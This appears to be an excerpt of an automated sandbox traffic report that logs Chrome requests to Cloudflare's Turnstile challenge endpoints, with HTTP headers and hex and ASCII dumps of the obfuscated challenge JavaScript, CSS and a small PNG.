                                                  Data Ascii: y:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-comp
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78
                                                  Data Ascii: {left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex
                                                  2024-12-09 08:34:43 UTC1369INData Raw: 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a
                                                  Data Ascii: lor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.449757104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:44 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ef3a85b7bfe0fa7&lang=auto HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:45 UTC331INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:45 GMT
                                                  Content-Type: application/javascript; charset=UTF-8
                                                  Content-Length: 116818
                                                  Connection: close
                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a867891b0c82-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:45 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 65 64 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65
                                                  Data Ascii: ed","testing_only":"Testing%20only.","turnstile_feedback_description":"Send%20Feedback","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_footer_privacy":"Privacy","turnstile_footer_terms":"Terms","not_embedde
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 67 62 2c 67 6c 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 66 33 2c 66 34 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 37 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 32 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 37 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 30 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 39 36 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 33 30 31 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 37 34 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49
                                                  Data Ascii: gb,gl,gw,gA,gB,gC,gG,gH,f3,f4){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1137))/1*(-parseInt(gI(1372))/2)+parseInt(gI(1247))/3+-parseInt(gI(1320))/4+-parseInt(gI(496))/5*(parseInt(gI(301))/6)+-parseInt(gI(874))/7+-parseInt(gI
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 69 4c 46 6d 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 49 4d 61 44 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 51 47 70 50 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 69 63 46 52 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 72 70 56 54 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 52 79 70 6d 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 76 48 4d 59 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68
                                                  Data Ascii: h,i){return h*i},'iLFmf':function(h,i){return h*i},'IMaDn':function(h,i){return h!=i},'QGpPB':function(h,i){return h<i},'icFRy':function(h,i){return i!=h},'rpVTv':function(h,i){return h<i},'RypmZ':function(h,i){return h===i},'vHMYA':function(h,i){return h
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 28 50 2c 31 29 2c 4c 3d 3d 64 5b 67 4d 28 31 32 38 37 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 67 4d 28 31 30 34 30 29 5d 28 64 5b 67 4d 28 33 30 38 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 46 3d 28 47 2d 2d 2c 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 67 4d 28 31 32 34 36 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 44 5b 4f 5d 3d 48 2b 2b 2c 64 5b 67 4d 28 33 30 38 29 5d 28 53 74 72 69 6e 67 2c 4e 29 29 7d 69 66 28 46 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 4d 28 34 34 35 29 5d 5b 67 4d 28 31 31 32 33 29 5d 5b 67 4d 28 38 36 32 29 5d 28 45 2c 46 29 29 7b 69 66 28 64 5b 67 4d 28 36 35 35 29 5d 28 32 35 36 2c 46 5b 67 4d 28 32 36 33 29 5d 28 30 29 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c
                                                  Data Ascii: (P,1),L==d[gM(1287)](o,1)?(L=0,J[gM(1040)](d[gM(308)](s,K)),K=0):L++,P>>=1,C++);F=(G--,0==G&&(G=Math[gM(1246)](2,I),I++),D[O]=H++,d[gM(308)](String,N))}if(F!==''){if(Object[gM(445)][gM(1123)][gM(862)](E,F)){if(d[gM(655)](256,F[gM(263)](0))){for(C=0;C<I;K<
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 50 28 31 32 34 36 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 64 5b 67 50 28 32 39 36 29 5d 28 46 2c 4b 29 3b 29 66 6f 72 28 4c 3d 67 50 28 35 35 33 29 5b 67 50 28 31 31 32 38 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 46 2a 28 30 3c 4e 3f 31 3a 30 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 50 28 39 32 39 29 5d 28 6f 2c 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 4e 3d 48 26 47 3b 63 6f 6e 74 69 6e 75 65 7d 62 72
                                                  Data Ascii: (J=0,K=Math[gP(1246)](2,2),F=1;d[gP(296)](F,K);)for(L=gP(553)[gP(1128)]('|'),M=0;!![];){switch(L[M++]){case'0':F<<=1;continue;case'1':J|=F*(0<N?1:0);continue;case'2':H>>=1;continue;case'3':0==H&&(H=j,G=d[gP(929)](o,I++));continue;case'4':N=H&G;continue}br
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 4a 28 35 38 31 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 31 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 36 29 7b 69 66 28 68 36 3d 67 4a 2c 65 4d 5b 68 36 28 35 38 31 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 36 28 35 38 31 29 5d 3d 21 21 5b 5d 7d 2c 65 56 3d 30 2c 65 4e 5b 67 4a 28 31 30 33 34 29 5d 3d 3d 3d 67 4a 28 31 33 37 30 29 3f 65 4e 5b 67 4a 28 32 34 37 29 5d 28 67 4a 28 32 37 31 29 2c 66 75 6e 63 74 69 6f 6e 28 68 68 2c 63 29 7b 68 68 3d 67 4a 2c 63 3d 7b 27 66 75 6e 50 67 27 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 66 29 7d 7d 2c 63 5b 68 68 28 35 32 34 29 5d 28 73 65 74 54 69 6d 65 6f 75 74 2c 65 59 2c 30 29 7d 29 3a 73 65 74 54 69 6d 65 6f 75 74 28 65 59 2c 30
                                                  Data Ascii: f.h,g}(),eM[gJ(581)]=![],eM[gJ(1178)]=function(h6){if(h6=gJ,eM[h6(581)])return;eM[h6(581)]=!![]},eV=0,eN[gJ(1034)]===gJ(1370)?eN[gJ(247)](gJ(271),function(hh,c){hh=gJ,c={'funPg':function(d,e,f){return d(e,f)}},c[hh(524)](setTimeout,eY,0)}):setTimeout(eY,0
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 5e 74 68 69 73 2e 67 5d 3d 5a 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 74 68 69 73 2e 68 5b 6e 5b 68 6d 28 35 34 35 29 5d 28 33 36 2c 74 68 69 73 2e 67 29 5d 3d 55 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 66 6f 72 28 42 3d 30 3b 32 35 36 3e 42 3b 74 68 69 73 2e 68 5b 6e 5b 68 6d 28 31 32 30 35 29 5d 28 42 2c 74 68 69 73 2e 67 29 5d 3d 6e 5b 68 6d 28 31 30 39 35 29 5d 28 6e 5b 68 6d 28 38 35 39 29 5d 28 74 68 69 73 2e 67 2a 33 65 34 2c 4f 5b 68 6d 28 33 34 39 29 5d 28 29 29 2c 30 29 2c 42 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 74 68 69 73 2e 68 5b 33 34 2e 30 32 5e 74 68 69 73 2e 67 5d 3d 61 63 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 74 68 69 73 2e 68 5b 6e 5b 68 6d 28 31 31 34 34 29 5d 28 31
                                                  Data Ascii: ^this.g]=Z;continue;case'5':this.h[n[hm(545)](36,this.g)]=U;continue;case'6':for(B=0;256>B;this.h[n[hm(1205)](B,this.g)]=n[hm(1095)](n[hm(859)](this.g*3e4,O[hm(349)]()),0),B++);continue;case'7':this.h[34.02^this.g]=ac;continue;case'8':this.h[n[hm(1144)](1
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 72 79 7b 72 65 74 75 72 6e 20 65 5b 68 78 28 31 35 30 30 29 5d 28 68 78 28 31 30 38 35 29 2c 65 5b 68 78 28 31 32 30 29 5d 29 3f 76 6f 69 64 20 30 3a 66 32 28 63 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 65 5b 68 78 28 32 35 34 29 5d 21 3d 3d 68 78 28 32 30 37 29 3f 76 6f 69 64 20 30 3a 65 5b 68 78 28 37 33 38 29 5d 28 66 30 2c 65 5b 68 78 28 37 33 38 29 5d 28 66 31 2c 63 29 29 7d 7d 2c 66 33 3d 5b 5d 2c 66 34 3d 30 3b 32 35 36 3e 66 34 3b 66 33 5b 66 34 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 36 31 38 29 5d 28 66 34 29 2c 66 34 2b 2b 29 3b 66 35 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 37 34 34 29 29 2c 66 36 3d 61 74 6f 62 28 67 4a 28 36 34 30 29 29 2c 65 4d 5b 67 4a 28 31 31 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 38 2c 64 2c 65 2c 66 2c 67
                                                  Data Ascii: ry{return e[hx(1500)](hx(1085),e[hx(120)])?void 0:f2(c)}catch(h){return e[hx(254)]!==hx(207)?void 0:e[hx(738)](f0,e[hx(738)](f1,c))}},f3=[],f4=0;256>f4;f3[f4]=String[gJ(618)](f4),f4++);f5=(0,eval)(gJ(744)),f6=atob(gJ(640)),eM[gJ(1104)]=function(i8,d,e,f,g
                                                  2024-12-09 08:34:45 UTC1369INData Raw: 7d 2c 61 30 5b 69 62 28 37 30 38 29 5d 3d 49 5b 69 62 28 31 31 37 29 5d 2c 61 30 5b 69 62 28 39 34 33 29 5d 3d 56 5b 69 62 28 35 30 37 29 5d 5b 69 62 28 34 35 35 29 5d 2c 61 30 5b 69 62 28 32 39 37 29 5d 3d 57 5b 69 62 28 35 30 37 29 5d 5b 69 62 28 39 31 37 29 5d 2c 61 30 5b 69 62 28 31 39 37 29 5d 3d 69 62 28 31 31 32 31 29 2c 61 30 5b 69 62 28 39 37 36 29 5d 3d 58 5b 69 62 28 35 30 37 29 5d 5b 69 62 28 32 35 33 29 5d 2c 61 30 5b 69 62 28 38 30 31 29 5d 3d 59 5b 69 62 28 35 30 37 29 5d 5b 69 62 28 34 39 30 29 5d 2c 61 30 5b 69 62 28 37 31 30 29 5d 3d 69 62 28 31 34 35 33 29 2c 55 5b 69 62 28 31 30 37 37 29 5d 5b 69 62 28 31 33 30 29 5d 28 61 30 2c 27 2a 27 29 29 7d 2c 31 35 30 30 29 2c 21 5b 5d 3b 65 6c 73 65 20 66 6f 72 28 6a 3d 69 5b 69 61 28 33 33 30
                                                  Data Ascii: },a0[ib(708)]=I[ib(117)],a0[ib(943)]=V[ib(507)][ib(455)],a0[ib(297)]=W[ib(507)][ib(917)],a0[ib(197)]=ib(1121),a0[ib(976)]=X[ib(507)][ib(253)],a0[ib(801)]=Y[ib(507)][ib(490)],a0[ib(710)]=ib(1453),U[ib(1077)][ib(130)](a0,'*'))},1500),![];else for(j=i[ia(330


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.449758104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:44 UTC739OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:45 UTC240INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:45 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 61
                                                  Connection: close
                                                  cache-control: max-age=2629800, public
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a8678c477c93-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:45 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.449760104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:46 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:46 UTC240INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:46 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 61
                                                  Connection: close
                                                  cache-control: max-age=2629800, public
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a871ea7dc466-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:46 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                  Data Ascii: PNGIHDRsIDAT$IENDB`


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.449761104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:47 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ef3a85b7bfe0fa7&lang=auto HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:47 UTC331INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:47 GMT
                                                  Content-Type: application/javascript; charset=UTF-8
                                                  Content-Length: 118396
                                                  Connection: close
                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a875e91a0ca0-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:47 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73
                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33
                                                  Data Ascii: %3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 67 33 2c 67 37 2c 67 61 2c 67 62 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 38 2c 67 39 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 38 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 31 32 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 37 38 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 33 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 34 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 39 37 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 34 38 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67
